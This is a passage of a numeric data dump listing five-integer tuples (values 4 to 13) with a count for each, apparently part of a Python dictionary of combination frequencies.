(4, 4, 6, 7, 12): 17,
(4, 4, 6, 7, 13): 9,
(4, 4, 6, 8, 8): 11,
(4, 4, 6, 8, 9): 19,
(4, 4, 6, 8, 10): 18,
(4, 4, 6, 8, 11): 18,
(4, 4, 6, 8, 12): 18,
(4, 4, 6, 8, 13): 18,
(4, 4, 6, 9, 9): 4,
(4, 4, 6, 9, 10): 5,
(4, 4, 6, 9, 11): 5,
(4, 4, 6, 9, 12): 24,
(4, 4, 6, 9, 13): 11,
(4, 4, 6, 10, 10): 8,
(4, 4, 6, 10, 11): 8,
(4, 4, 6, 10, 12): 16,
(4, 4, 6, 10, 13): 9,
(4, 4, 6, 11, 11): 3,
(4, 4, 6, 11, 12): 16,
(4, 4, 6, 11, 13): 5,
(4, 4, 6, 12, 12): 15,
(4, 4, 6, 12, 13): 11,
(4, 4, 6, 13, 13): 3,
(4, 4, 7, 7, 7): 4,
(4, 4, 7, 7, 8): 9,
(4, 4, 7, 7, 9): 5,
(4, 4, 7, 7, 10): 6,
(4, 4, 7, 7, 11): 5,
(4, 4, 7, 7, 12): 7,
(4, 4, 7, 7, 13): 6,
(4, 4, 7, 8, 8): 6,
(4, 4, 7, 8, 9): 3,
(4, 4, 7, 8, 10): 12,
(4, 4, 7, 8, 11): 4,
(4, 4, 7, 8, 12): 15,
(4, 4, 7, 8, 13): 7,
(4, 4, 7, 9, 9): 4,
(4, 4, 7, 9, 10): 9,
(4, 4, 7, 9, 11): 11,
(4, 4, 7, 9, 12): 7,
(4, 4, 7, 9, 13): 10,
(4, 4, 7, 10, 10): 6,
(4, 4, 7, 10, 11): 8,
(4, 4, 7, 10, 12): 15,
(4, 4, 7, 10, 13): 4,
(4, 4, 7, 11, 11): 4,
(4, 4, 7, 11, 12): 3,
(4, 4, 7, 11, 13): 6,
(4, 4, 7, 12, 12): 4,
(4, 4, 7, 12, 13): 6,
(4, 4, 7, 13, 13): 2,
(4, 4, 8, 8, 8): 2,
(4, 4, 8, 8, 9): 8,
(4, 4, 8, 8, 10): 9,
(4, 4, 8, 8, 11): 8,
(4, 4, 8, 8, 12): 10,
(4, 4, 8, 8, 13): 8,
(4, 4, 8, 9, 9): 1,
(4, 4, 8, 9, 10): 10,
(4, 4, 8, 9, 11): 2,
(4, 4, 8, 9, 12): 6,
(4, 4, 8, 9, 13): 2,
(4, 4, 8, 10, 10): 8,
(4, 4, 8, 10, 11): 11,
(4, 4, 8, 10, 12): 21,
(4, 4, 8, 10, 13): 10,
(4, 4, 8, 11, 11): 2,
(4, 4, 8, 11, 12): 13,
(4, 4, 8, 11, 13): 1,
(4, 4, 8, 12, 12): 7,
(4, 4, 8, 12, 13): 11,
(4, 4, 8, 13, 13): 2,
(4, 4, 9, 9, 10): 4,
(4, 4, 9, 9, 11): 3,
(4, 4, 9, 9, 12): 5,
(4, 4, 9, 9, 13): 1,
(4, 4, 9, 10, 10): 3,
(4, 4, 9, 10, 11): 10,
(4, 4, 9, 10, 12): 11,
(4, 4, 9, 10, 13): 6,
(4, 4, 9, 11, 11): 6,
(4, 4, 9, 11, 12): 5,
(4, 4, 9, 11, 13): 9,
(4, 4, 9, 12, 12): 7,
(4, 4, 9, 12, 13): 5,
(4, 4, 10, 10, 10): 2,
(4, 4, 10, 10, 11): 2,
(4, 4, 10, 10, 12): 8,
(4, 4, 10, 10, 13): 2,
(4, 4, 10, 11, 11): 1,
(4, 4, 10, 11, 12): 14,
(4, 4, 10, 11, 13): 7,
(4, 4, 10, 12, 12): 8,
(4, 4, 10, 12, 13): 12,
(4, 4, 10, 13, 13): 2,
(4, 4, 11, 11, 11): 1,
(4, 4, 11, 11, 12): 2,
(4, 4, 11, 11, 13): 6,
(4, 4, 11, 12, 12): 3,
(4, 4, 11, 12, 13): 4,
(4, 4, 11, 13, 13): 4,
(4, 4, 12, 12, 12): 2,
(4, 4, 12, 12, 13): 1,
(4, 4, 12, 13, 13): 1,
(4, 4, 13, 13, 13): 1,
(4, 5, 5, 5, 5): 1,
(4, 5, 5, 5, 7): 3,
(4, 5, 5, 5, 8): 6,
(4, 5, 5, 5, 9): 3,
(4, 5, 5, 5, 10): 6,
(4, 5, 5, 5, 11): 3,
(4, 5, 5, 5, 12): 6,
(4, 5, 5, 5, 13): 2,
(4, 5, 5, 6, 6): 3,
(4, 5, 5, 6, 7): 13,
(4, 5, 5, 6, 8): 19,
(4, 5, 5, 6, 9): 7,
(4, 5, 5, 6, 10): 14,
(4, 5, 5, 6, 11): 6,
(4, 5, 5, 6, 12): 12,
(4, 5, 5, 6, 13): 10,
(4, 5, 5, 7, 7): 5,
(4, 5, 5, 7, 8): 11,
(4, 5, 5, 7, 9): 12,
(4, 5, 5, 7, 10): 12,
(4, 5, 5, 7, 11): 10,
(4, 5, 5, 7, 12): 8,
(4, 5, 5, 7, 13): 7,
(4, 5, 5, 8, 8): 5,
(4, 5, 5, 8, 9): 8,
(4, 5, 5, 8, 10): 12,
(4, 5, 5, 8, 11): 12,
(4, 5, 5, 8, 12): 2,
(4, 5, 5, 8, 13): 7,
(4, 5, 5, 9, 9): 1,
(4, 5, 5, 9, 10): 3,
(4, 5, 5, 9, 11): 7,
(4, 5, 5, 9, 12): 11,
(4, 5, 5, 9, 13): 3,
(4, 5, 5, 10, 10): 7,
(4, 5, 5, 10, 11): 4,
(4, 5, 5, 10, 12): 14,
(4, 5, 5, 10, 13): 9,
(4, 5, 5, 11, 11): 2,
(4, 5, 5, 11, 12): 7,
(4, 5, 5, 11, 13): 9,
(4, 5, 5, 12, 12): 1,
(4, 5, 5, 12, 13): 3,
(4, 5, 5, 13, 13): 2,
(4, 5, 6, 6, 6): 4,
(4, 5, 6, 6, 7): 13,
(4, 5, 6, 6, 8): 11,
(4, 5, 6, 6, 9): 22,
(4, 5, 6, 6, 10): 16,
(4, 5, 6, 6, 11): 5,
(4, 5, 6, 6, 12): 17,
(4, 5, 6, 6, 13): 6,
(4, 5, 6, 7, 7): 14,
(4, 5, 6, 7, 8): 20,
(4, 5, 6, 7, 9): 21,
(4, 5, 6, 7, 10): 21,
(4, 5, 6, 7, 11): 11,
(4, 5, 6, 7, 12): 12,
(4, 5, 6, 7, 13): 10,
(4, 5, 6, 8, 8): 16,
(4, 5, 6, 8, 9): 21,
(4, 5, 6, 8, 10): 31,
(4, 5, 6, 8, 11): 12,
(4, 5, 6, 8, 12): 34,
(4, 5, 6, 8, 13): 9,
(4, 5, 6, 9, 9): 7,
(4, 5, 6, 9, 10): 11,
(4, 5, 6, 9, 11): 12,
(4, 5, 6, 9, 12): 24,
(4, 5, 6, 9, 13): 18,
(4, 5, 6, 10, 10): 8,
(4, 5, 6, 10, 11): 12,
(4, 5, 6, 10, 12): 22,
(4, 5, 6, 10, 13): 19,
(4, 5, 6, 11, 11): 5,
(4, 5, 6, 11, 12): 14,
(4, 5, 6, 11, 13): 10,
(4, 5, 6, 12, 12): 12,
(4, 5, 6, 12, 13): 11,
(4, 5, 6, 13, 13): 5,
(4, 5, 7, 7, 7): 7,
(4, 5, 7, 7, 8): 12,
(4, 5, 7, 7, 9): 12,
(4, 5, 7, 7, 10): 10,
(4, 5, 7, 7, 11): 4,
(4, 5, 7, 7, 12): 11,
(4, 5, 7, 7, 13): 6,
(4, 5, 7, 8, 8): 3,
(4, 5, 7, 8, 9): 20,
(4, 5, 7, 8, 10): 10,
(4, 5, 7, 8, 11): 16,
(4, 5, 7, 8, 12): 12,
(4, 5, 7, 8, 13): 20,
(4, 5, 7, 9, 9): 4,
(4, 5, 7, 9, 10): 19,
(4, 5, 7, 9, 11): 8,
(4, 5, 7, 9, 12): 21,
(4, 5, 7, 9, 13): 5,
(4, 5, 7, 10, 10): 9,
(4, 5, 7, 10, 11): 15,
(4, 5, 7, 10, 12): 24,
(4, 5, 7, 10, 13): 8,
(4, 5, 7, 11, 11): 5,
(4, 5, 7, 11, 12): 10,
(4, 5, 7, 11, 13): 4,
(4, 5, 7, 12, 12): 3,
(4, 5, 7, 12, 13): 13,
(4, 5, 7, 13, 13): 5,
(4, 5, 8, 8, 8): 5,
(4, 5, 8, 8, 9): 5,
(4, 5, 8, 8, 10): 14,
(4, 5, 8, 8, 11): 1,
(4, 5, 8, 8, 12): 14,
(4, 5, 8, 8, 13): 2,
(4, 5, 8, 9, 9): 8,
(4, 5, 8, 9, 10): 19,
(4, 5, 8, 9, 11): 17,
(4, 5, 8, 9, 12): 8,
(4, 5, 8, 9, 13): 6,
(4, 5, 8, 10, 10): 12,
(4, 5, 8, 10, 11): 20,
(4, 5, 8, 10, 12): 24,
(4, 5, 8, 10, 13): 19,
(4, 5, 8, 11, 11): 10,
(4, 5, 8, 11, 12): 5,
(4, 5, 8, 11, 13): 13,
(4, 5, 8, 12, 12): 6,
(4, 5, 8, 12, 13): 10,
(4, 5, 8, 13, 13): 6,
(4, 5, 9, 9, 9): 3,
(4, 5, 9, 9, 10): 8,
(4, 5, 9, 9, 11): 6,
(4, 5, 9, 9, 12): 6,
(4, 5, 9, 10, 10): 10,
(4, 5, 9, 10, 11): 8,
(4, 5, 9, 10, 12): 18,
(4, 5, 9, 10, 13): 9,
(4, 5, 9, 11, 11): 7,
(4, 5, 9, 11, 12): 16,
(4, 5, 9, 11, 13): 11,
(4, 5, 9, 12, 12): 10,
(4, 5, 9, 12, 13): 13,
(4, 5, 9, 13, 13): 6,
(4, 5, 10, 10, 10): 6,
(4, 5, 10, 10, 11): 8,
(4, 5, 10, 10, 12): 16,
(4, 5, 10, 10, 13): 6,
(4, 5, 10, 11, 11): 6,
(4, 5, 10, 11, 12): 21,
(4, 5, 10, 11, 13): 10,
(4, 5, 10, 12, 12): 13,
(4, 5, 10, 12, 13): 10,
(4, 5, 10, 13, 13): 4,
(4, 5, 11, 11, 11): 3,
(4, 5, 11, 11, 12): 6,
(4, 5, 11, 11, 13): 3,
(4, 5, 11, 12, 12): 4,
(4, 5, 11, 12, 13): 8,
(4, 5, 11, 13, 13): 5,
(4, 5, 12, 12, 12): 4,
(4, 5, 12, 12, 13): 5,
(4, 5, 12, 13, 13): 2,
(4, 6, 6, 6, 6): 2,
(4, 6, 6, 6, 7): 5,
(4, 6, 6, 6, 8): 13,
(4, 6, 6, 6, 9): 8,
(4, 6, 6, 6, 10): 10,
(4, 6, 6, 6, 11): 5,
(4, 6, 6, 6, 12): 15,
(4, 6, 6, 6, 13): 3,
(4, 6, 6, 7, 7): 5,
(4, 6, 6, 7, 8): 7,
(4, 6, 6, 7, 9): 19,
(4, 6, 6, 7, 10): 8,
(4, 6, 6, 7, 11): 12,
(4, 6, 6, 7, 12): 13,
(4, 6, 6, 7, 13): 6,
(4, 6, 6, 8, 8): 6,
(4, 6, 6, 8, 9): 23,
(4, 6, 6, 8, 10): 20,
(4, 6, 6, 8, 11): 11,
(4, 6, 6, 8, 12): 19,
(4, 6, 6, 8, 13): 7,
(4, 6, 6, 9, 9): 8,
(4, 6, 6, 9, 10): 18,
(4, 6, 6, 9, 11): 11,
(4, 6, 6, 9, 12): 23,
(4, 6, 6, 9, 13): 7,
(4, 6, 6, 10, 10): 3,
(4, 6, 6, 10, 11): 4,
(4, 6, 6, 10, 12): 27,
(4, 6, 6, 10, 13): 9,
(4, 6, 6, 11, 11): 2,
(4, 6, 6, 11, 12): 12,
(4, 6, 6, 11, 13): 11,
(4, 6, 6, 12, 12): 13,
(4, 6, 6, 12, 13): 11,
(4, 6, 6, 13, 13): 2,
(4, 6, 7, 7, 7): 4,
(4, 6, 7, 7, 8): 15,
(4, 6, 7, 7, 9): 6,
(4, 6, 7, 7, 10): 13,
(4, 6, 7, 7, 11): 5,
(4, 6, 7, 7, 12): 17,
(4, 6, 7, 7, 13): 6,
(4, 6, 7, 8, 8): 14,
(4, 6, 7, 8, 9): 11,
(4, 6, 7, 8, 10): 24,
(4, 6, 7, 8, 11): 19,
(4, 6, 7, 8, 12): 28,
(4, 6, 7, 8, 13): 15,
(4, 6, 7, 9, 9): 12,
(4, 6, 7, 9, 10): 14,
(4, 6, 7, 9, 11): 18,
(4, 6, 7, 9, 12): 26,
(4, 6, 7, 9, 13): 11,
(4, 6, 7, 10, 10): 12,
(4, 6, 7, 10, 11): 15,
(4, 6, 7, 10, 12): 15,
(4, 6, 7, 10, 13): 14,
(4, 6, 7, 11, 11): 6,
(4, 6, 7, 11, 12): 13,
(4, 6, 7, 11, 13): 17,
(4, 6, 7, 12, 12): 26,
(4, 6, 7, 12, 13): 11,
(4, 6, 7, 13, 13): 2,
(4, 6, 8, 8, 8): 5,
(4, 6, 8, 8, 9): 12,
(4, 6, 8, 8, 10): 15,
(4, 6, 8, 8, 11): 14,
(4, 6, 8, 8, 12): 17,
(4, 6, 8, 8, 13): 15,
(4, 6, 8, 9, 9): 15,
(4, 6, 8, 9, 10): 20,
(4, 6, 8, 9, 11): 12,
(4, 6, 8, 9, 12): 39,
(4, 6, 8, 9, 13): 6,
(4, 6, 8, 10, 10): 20,
(4, 6, 8, 10, 11): 22,
(4, 6, 8, 10, 12): 23,
(4, 6, 8, 10, 13): 17,
(4, 6, 8, 11, 11): 5,
(4, 6, 8, 11, 12): 25,
(4, 6, 8, 11, 13): 11,
(4, 6, 8, 12, 12): 31,
(4, 6, 8, 12, 13): 22,
(4, 6, 8, 13, 13): 6,
(4, 6, 9, 9, 9): 5,
(4, 6, 9, 9, 10): 14,
(4, 6, 9, 9, 11): 7,
(4, 6, 9, 9, 12): 18,
(4, 6, 9, 9, 13): 10,
(4, 6, 9, 10, 10): 7,
(4, 6, 9, 10, 11): 7,
(4, 6, 9, 10, 12): 31,
(4, 6, 9, 10, 13): 14,
(4, 6, 9, 11, 11): 6,
(4, 6, 9, 11, 12): 19,
(4, 6, 9, 11, 13): 16,
(4, 6, 9, 12, 12): 26,
(4, 6, 9, 12, 13): 12,
(4, 6, 9, 13, 13): 5,
(4, 6, 10, 10, 10): 3,
(4, 6, 10, 10, 11): 9,
(4, 6, 10, 10, 12): 20,
(4, 6, 10, 10, 13): 9,
(4, 6, 10, 11, 11): 12,
(4, 6, 10, 11, 12): 17,
(4, 6, 10, 11, 13): 8,
(4, 6, 10, 12, 12): 13,
(4, 6, 10, 12, 13): 14,
(4, 6, 10, 13, 13): 5,
(4, 6, 11, 11, 11): 3,
(4, 6, 11, 11, 12): 7,
(4, 6, 11, 11, 13): 3,
(4, 6, 11, 12, 12): 11,
(4, 6, 11, 12, 13): 6,
(4, 6, 11, 13, 13): 7,
(4, 6, 12, 12, 12): 11,
(4, 6, 12, 12, 13): 16,
(4, 6, 12, 13, 13): 6,
(4, 6, 13, 13, 13): 1,
(4, 7, 7, 7, 7): 2,
(4, 7, 7, 7, 8): 6,
(4, 7, 7, 7, 9): 8,
(4, 7, 7, 7, 10): 8,
(4, 7, 7, 7, 11): 6,
(4, 7, 7, 7, 12): 5,
(4, 7, 7, 7, 13): 3,
(4, 7, 7, 8, 8): 5,
(4, 7, 7, 8, 9): 12,
(4, 7, 7, 8, 10): 14,
(4, 7, 7, 8, 11): 12,
(4, 7, 7, 8, 12): 6,
(4, 7, 7, 8, 13): 5,
(4, 7, 7, 9, 9): 4,
(4, 7, 7, 9, 10): 8,
(4, 7, 7, 9, 11): 7,
(4, 7, 7, 9, 12): 13,
(4, 7, 7, 9, 13): 4,
(4, 7, 7, 10, 10): 4,
(4, 7, 7, 10, 11): 10,
(4, 7, 7, 10, 12): 16,
(4, 7, 7, 10, 13): 9,
(4, 7, 7, 11, 11): 3,
(4, 7, 7, 11, 12): 8,
(4, 7, 7, 11, 13): 11,
(4, 7, 7, 12, 12): 4,
(4, 7, 7, 12, 13): 8,
(4, 7, 7, 13, 13): 3,
(4, 7, 8, 8, 8): 4,
(4, 7, 8, 8, 9): 5,
(4, 7, 8, 8, 10): 16,
(4, 7, 8, 8, 11): 6,
(4, 7, 8, 8, 12): 11,
(4, 7, 8, 8, 13): 4,
(4, 7, 8, 9, 9): 10,
(4, 7, 8, 9, 10): 17,
(4, 7, 8, 9, 11): 15,
(4, 7, 8, 9, 12): 9,
(4, 7, 8, 9, 13): 14,
(4, 7, 8, 10, 10): 6,
(4, 7, 8, 10, 11): 8,
(4, 7, 8, 10, 12): 28,
(4, 7, 8, 10, 13): 13,
(4, 7, 8, 11, 11): 7,
(4, 7, 8, 11, 12): 9,
(4, 7, 8, 11, 13): 15,
(4, 7, 8, 12, 12): 6,
(4, 7, 8, 12, 13): 5,
(4, 7, 8, 13, 13): 6,
(4, 7, 9, 9, 9): 3,
(4, 7, 9, 9, 10): 6,
(4, 7, 9, 9, 11): 4,
(4, 7, 9, 9, 12): 9,
(4, 7, 9, 9, 13): 10,
(4, 7, 9, 10, 10): 6,
(4, 7, 9, 10, 11): 15,
(4, 7, 9, 10, 12): 13,
(4, 7, 9, 10, 13): 11,
(4, 7, 9, 11, 11): 9,
(4, 7, 9, 11, 12): 18,
(4, 7, 9, 11, 13): 2,
(4, 7, 9, 12, 12): 9,
(4, 7, 9, 12, 13): 16,
(4, 7, 9, 13, 13): 4,
(4, 7, 10, 10, 10): 5,
(4, 7, 10, 10, 11): 9,
(4, 7, 10, 10, 12): 6,
(4, 7, 10, 10, 13): 6,
(4, 7, 10, 11, 11): 4,
(4, 7, 10, 11, 12): 14,
(4, 7, 10, 11, 13): 12,
(4, 7, 10, 12, 12): 14,
(4, 7, 10, 12, 13): 14,
(4, 7, 10, 13, 13): 7,
(4, 7, 11, 11, 11): 3,
(4, 7, 11, 11, 12): 4,
(4, 7, 11, 11, 13): 2,
(4, 7, 11, 12, 12): 5,
(4, 7, 11, 12, 13): 12,
(4, 7, 11, 13, 13): 4,
(4, 7, 12, 12, 12): 3,
(4, 7, 12, 12, 13): 5,
(4, 7, 12, 13, 13): 5,
(4, 7, 13, 13, 13): 4,
(4, 8, 8, 8, 9): 2,
(4, 8, 8, 8, 10): 9,
(4, 8, 8, 8, 11): 7,
(4, 8, 8, 8, 12): 3,
(4, 8, 8, 8, 13): 4,
(4, 8, 8, 9, 9): 2,
(4, 8, 8, 9, 10): 7,
(4, 8, 8, 9, 11): 6,
(4, 8, 8, 9, 12): 8,
(4, 8, 8, 9, 13): 4,
(4, 8, 8, 10, 10): 5,
(4, 8, 8, 10, 11): 11,
(4, 8, 8, 10, 12): 19,
(4, 8, 8, 10, 13): 8,
(4, 8, 8, 11, 11): 3,
(4, 8, 8, 11, 12): 8,
(4, 8, 8, 11, 13): 3,
(4, 8, 8, 12, 12): 6,
(4, 8, 8, 12, 13): 4,
(4, 8, 8, 13, 13): 3,
(4, 8, 9, 9, 9): 1,
(4, 8, 9, 9, 10): 3,
(4, 8, 9, 9, 11): 7,
(4, 8, 9, 9, 12): 8,
(4, 8, 9, 9, 13): 1,
(4, 8, 9, 10, 10): 13,
(4, 8, 9, 10, 11): 14,
(4, 8, 9, 10, 12): 26,
(4, 8, 9, 10, 13): 10,
(4, 8, 9, 11, 11): 8,
(4, 8, 9, 11, 12): 5,
(4, 8, 9, 11, 13): 18,
(4, 8, 9, 12, 12): 12,
(4, 8, 9, 12, 13): 11,
(4, 8, 9, 13, 13): 5,
(4, 8, 10, 10, 10): 6,
(4, 8, 10, 10, 11): 8,
(4, 8, 10, 10, 12): 9,
(4, 8, 10, 10, 13): 7,
(4, 8, 10, 11, 11): 5,
(4, 8, 10, 11, 12): 17,
(4, 8, 10, 11, 13): 8,
(4, 8, 10, 12, 12): 16,
(4, 8, 10, 12, 13): 23,
(4, 8, 10, 13, 13): 5,
(4, 8, 11, 11, 11): 1,
(4, 8, 11, 11, 12): 6,
(4, 8, 11, 11, 13): 7,
(4, 8, 11, 12, 12): 1,
(4, 8, 11, 12, 13): 8,
(4, 8, 11, 13, 13): 6,
(4, 8, 12, 12, 12): 3,
(4, 8, 12, 12, 13): 1,
(4, 8, 12, 13, 13): 3,
(4, 9, 9, 9, 10): 3,
(4, 9, 9, 9, 11): 4,
(4, 9, 9, 9, 12): 9,
(4, 9, 9, 9, 13): 1,
(4, 9, 9, 10, 10): 3,
(4, 9, 9, 10, 11): 3,
(4, 9, 9, 10, 12): 8,
(4, 9, 9, 10, 13): 6,
(4, 9, 9, 11, 12): 10,
(4, 9, 9, 11, 13): 2,
(4, 9, 9, 12, 12): 5,
(4, 9, 9, 12, 13): 6,
(4, 9, 9, 13, 13): 2,
(4, 9, 10, 10, 10): 1,
(4, 9, 10, 10, 11): 6,
(4, 9, 10, 10, 12): 7,
(4, 9, 10, 10, 13): 3,
(4, 9, 10, 11, 11): 8,
(4, 9, 10, 11, 12): 6,
(4, 9, 10, 11, 13): 10,
(4, 9, 10, 12, 12): 13,
(4, 9, 10, 12, 13): 8,
(4, 9, 10, 13, 13): 8,
(4, 9, 11, 11, 11): 2,
(4, 9, 11, 11, 12): 6,
(4, 9, 11, 11, 13): 6,
(4, 9, 11, 12, 12): 6,
(4, 9, 11, 12, 13): 12,
(4, 9, 11, 13, 13): 2,
(4, 9, 12, 12, 12): 3,
(4, 9, 12, 12, 13): 4,
(4, 9, 12, 13, 13): 2,
(4, 9, 13, 13, 13): 2,
(4, 10, 10, 10, 10): 2,
(4, 10, 10, 10, 11): 2,
(4, 10, 10, 10, 12): 6,
(4, 10, 10, 10, 13): 2,
(4, 10, 10, 11, 12): 9,
(4, 10, 10, 11, 13): 6,
(4, 10, 10, 12, 12): 2,
(4, 10, 10, 12, 13): 7,
(4, 10, 10, 13, 13): 3,
(4, 10, 11, 11, 11): 2,
(4, 10, 11, 11, 12): 6,
(4, 10, 11, 11, 13): 7,
(4, 10, 11, 12, 12): 8,
(4, 10, 11, 12, 13): 10,
(4, 10, 11, 13, 13): 3,
(4, 10, 12, 12, 12): 8,
(4, 10, 12, 12, 13): 6,
(4, 10, 12, 13, 13): 8,
(4, 10, 13, 13, 13): 3,
(4, 11, 11, 11, 11): 2,
(4, 11, 11, 11, 12): 1,
(4, 11, 11, 11, 13): 3,
(4, 11, 11, 12, 12): 1,
(4, 11, 11, 12, 13): 8,
(4, 11, 11, 13, 13): 1,
(4, 11, 12, 12, 12): 3,
(4, 11, 12, 12, 13): 6,
(4, 11, 12, 13, 13): 6,
(4, 11, 13, 13, 13): 4,
(4, 12, 12, 12, 12): 2,
(4, 12, 12, 12, 13): 1,
(4, 12, 12, 13, 13): 3,
(4, 12, 13, 13, 13): 4,
(4, 13, 13, 13, 13): 1,
(5, 5, 5, 5, 6): 1,
(5, 5, 5, 5, 7): 2,
(5, 5, 5, 5, 8): 2,
(5, 5, 5, 5, 12): 2,
(5, 5, 5, 5, 13): 1,
(5, 5, 5, 6, 6): 4,
(5, 5, 5, 6, 7): 5,
(5, 5, 5, 6, 8): 5,
(5, 5, 5, 6, 9): 4,
(5, 5, 5, 6, 10): 1,
(5, 5, 5, 6, 11): 4,
(5, 5, 5, 6, 12): 4,
(5, 5, 5, 6, 13): 6,
(5, 5, 5, 7, 7): 2,
(5, 5, 5, 7, 8): 4,
(5, 5, 5, 7, 9): 3,
(5, 5, 5, 7, 10): 5,
(5, 5, 5, 7, 11): 3,
(5, 5, 5, 7, 12): 6,
(5, 5, 5, 7, 13): 2,
(5, 5, 5, 8, 8): 1,
(5, 5, 5, 8, 9): 4,
(5, 5, 5, 8, 10): 6,
(5, 5, 5, 8, 11): 3,
(5, 5, 5, 8, 12): 3,
(5, 5, 5, 8, 13): 2,
(5, 5, 5, 9, 10): 7,
(5, 5, 5, 9, 12): 2,
(5, 5, 5, 9, 13): 4,
(5, 5, 5, 10, 11): 4,
(5, 5, 5, 10, 12): 2,
(5, 5, 5, 10, 13): 3,
(5, 5, 5, 11, 11): 1,
(5, 5, 5, 11, 12): 2,
(5, 5, 5, 11, 13): 1,
(5, 5, 5, 12, 12): 1,
(5, 5, 5, 12, 13): 1,
(5, 5, 5, 13, 13): 1,
(5, 5, 6, 6, 6): 2,
(5, 5, 6, 6, 7): 9,
(5, 5, 6, 6, 8): 2,
(5, 5, 6, 6, 9): 3,
(5, 5, 6, 6, 10): 3,
(5, 5, 6, 6, 11): 4,
(5, 5, 6, 6, 12): 11,
(5, 5, 6, 6, 13): 3,
(5, 5, 6, 7, 7): 3,
(5, 5, 6, 7, 8): 9,
(5, 5, 6, 7, 9): 9,
(5, 5, 6, 7, 10): 8,
(5, 5, 6, 7, 11): 10,
(5, 5, 6, 7, 12): 14,
(5, 5, 6, 7, 13): 9,
(5, 5, 6, 8, 8): 4,
(5, 5, 6, 8, 9): 10,
(5, 5, 6, 8, 10): 14,
(5, 5, 6, 8, 11): 7,
(5, 5, 6, 8, 12): 6,
(5, 5, 6, 8, 13): 5,
(5, 5, 6, 9, 9): 6,
(5, 5, 6, 9, 10): 7,
(5, 5, 6, 9, 11): 3,
(5, 5, 6, 9, 12): 7,
(5, 5, 6, 9, 13): 10,
(5, 5, 6, 10, 10): 8,
(5, 5, 6, 10, 11): 1,
(5, 5, 6, 10, 12): 8,
(5, 5, 6, 10, 13): 8,
(5, 5, 6, 11, 11): 2,
(5, 5, 6, 11, 12): 8,
(5, 5, 6, 11, 13): 7,
(5, 5, 6, 12, 12): 4,
(5, 5, 6, 12, 13): 8,
(5, 5, 6, 13, 13): 1,
(5, 5, 7, 7, 7): 3,
(5, 5, 7, 7, 8): 3,
(5, 5, 7, 7, 9): 4,
(5, 5, 7, 7, 10): 8,
(5, 5, 7, 7, 11): 3,
(5, 5, 7, 7, 12): 5,
(5, 5, 7, 7, 13): 3,
(5, 5, 7, 8, 8): 4,
(5, 5, 7, 8, 9): 8,
(5, 5, 7, 8, 10): 8,
(5, 5, 7, 8, 11): 5,
(5, 5, 7, 8, 12): 10,
(5, 5, 7, 8, 13): 6,
(5, 5, 7, 9, 9): 4,
(5, 5, 7, 9, 10): 10,
(5, 5, 7, 9, 11): 8,
(5, 5, 7, 9, 12): 3,
(5, 5, 7, 9, 13): 4,
(5, 5, 7, 10, 10): 2,
(5, 5, 7, 10, 11): 6,
(5, 5, 7, 10, 12): 9,
(5, 5, 7, 10, 13): 4,
(5, 5, 7, 11, 11): 1,
(5, 5, 7, 11, 12): 3,
(5, 5, 7, 11, 13): 6,
(5, 5, 7, 12, 12): 7,
(5, 5, 7, 12, 13): 4,
(5, 5, 7, 13, 13): 2,
(5, 5, 8, 8, 9): 1,
(5, 5, 8, 8, 10): 5,
(5, 5, 8, 8, 11): 3,
(5, 5, 8, 8, 12): 6,
(5, 5, 8, 8, 13): 6,
(5, 5, 8, 9, 9): 3,
(5, 5, 8, 9, 10): 8,
(5, 5, 8, 9, 11): 5,
(5, 5, 8, 9, 12): 6,
(5, 5, 8, 9, 13): 2,
(5, 5, 8, 10, 10): 5,
(5, 5, 8, 10, 11): 6,
(5, 5, 8, 10, 12): 9,
(5, 5, 8, 10, 13): 7,
(5, 5, 8, 11, 11): 4,
(5, 5, 8, 11, 12): 4,
(5, 5, 8, 11, 13): 6,
(5, 5, 8, 12, 12): 1,
(5, 5, 8, 12, 13): 5,
(5, 5, 9, 9, 10): 1,
(5, 5, 9, 9, 11): 4,
(5, 5, 9, 9, 12): 7,
(5, 5, 9, 9, 13): 2,
(5, 5, 9, 10, 10): 3,
(5, 5, 9, 10, 11): 7,
(5, 5, 9, 10, 12): 9,
(5, 5, 9, 10, 13): 5,
(5, 5, 9, 11, 11): 3,
(5, 5, 9, 11, 12): 5,
(5, 5, 9, 11, 13): 4,
(5, 5, 9, 12, 12): 2,
(5, 5, 9, 12, 13): 1,
(5, 5, 9, 13, 13): 2,
(5, 5, 10, 10, 10): 1,
(5, 5, 10, 10, 11): 3,
(5, 5, 10, 10, 12): 8,
(5, 5, 10, 10, 13): 3,
(5, 5, 10, 11, 11): 2,
(5, 5, 10, 11, 12): 7,
(5, 5, 10, 11, 13): 5,
(5, 5, 10, 12, 12): 3,
(5, 5, 10, 12, 13): 6,
(5, 5, 10, 13, 13): 3,
(5, 5, 11, 11, 12): 2,
(5, 5, 11, 11, 13): 2,
(5, 5, 11, 12, 12): 3,
(5, 5, 11, 12, 13): 4,
(5, 5, 11, 13, 13): 1,
(5, 5, 12, 12, 12): 2,
(5, 5, 12, 12, 13): 4,
(5, 5, 12, 13, 13): 2,
(5, 6, 6, 6, 6): 4,
(5, 6, 6, 6, 7): 12,
(5, 6, 6, 6, 8): 6,
(5, 6, 6, 6, 9): 5,
(5, 6, 6, 6, 10): 4,
(5, 6, 6, 6, 11): 4,
(5, 6, 6, 6, 12): 7,
(5, 6, 6, 6, 13): 4,
(5, 6, 6, 7, 7): 13,
(5, 6, 6, 7, 8): 9,
(5, 6, 6, 7, 9): 8,
(5, 6, 6, 7, 10): 11,
(5, 6, 6, 7, 11): 5,
(5, 6, 6, 7, 12): 14,
(5, 6, 6, 7, 13): 7,
(5, 6, 6, 8, 8): 3,
(5, 6, 6, 8, 9): 16,
(5, 6, 6, 8, 10): 17,
(5, 6, 6, 8, 11): 8,
(5, 6, 6, 8, 12): 11,
(5, 6, 6, 8, 13): 7,
(5, 6, 6, 9, 9): 8,
(5, 6, 6, 9, 10): 11,
(5, 6, 6, 9, 11): 5,
(5, 6, 6, 9, 12): 17,
(5, 6, 6, 9, 13): 4,
(5, 6, 6, 10, 10): 4,
(5, 6, 6, 10, 11): 4,
(5, 6, 6, 10, 12): 16,
(5, 6, 6, 10, 13): 9,
(5, 6, 6, 11, 11): 3,
(5, 6, 6, 11, 12): 12,
(5, 6, 6, 11, 13): 8,
(5, 6, 6, 12, 12): 10,
(5, 6, 6, 12, 13): 8,
(5, 6, 6, 13, 13): 5,
(5, 6, 7, 7, 7): 9,
(5, 6, 7, 7, 8): 11,
(5, 6, 7, 7, 9): 6,
(5, 6, 7, 7, 10): 6,
(5, 6, 7, 7, 11): 11,
(5, 6, 7, 7, 12): 10,
(5, 6, 7, 7, 13): 9,
(5, 6, 7, 8, 8): 11,
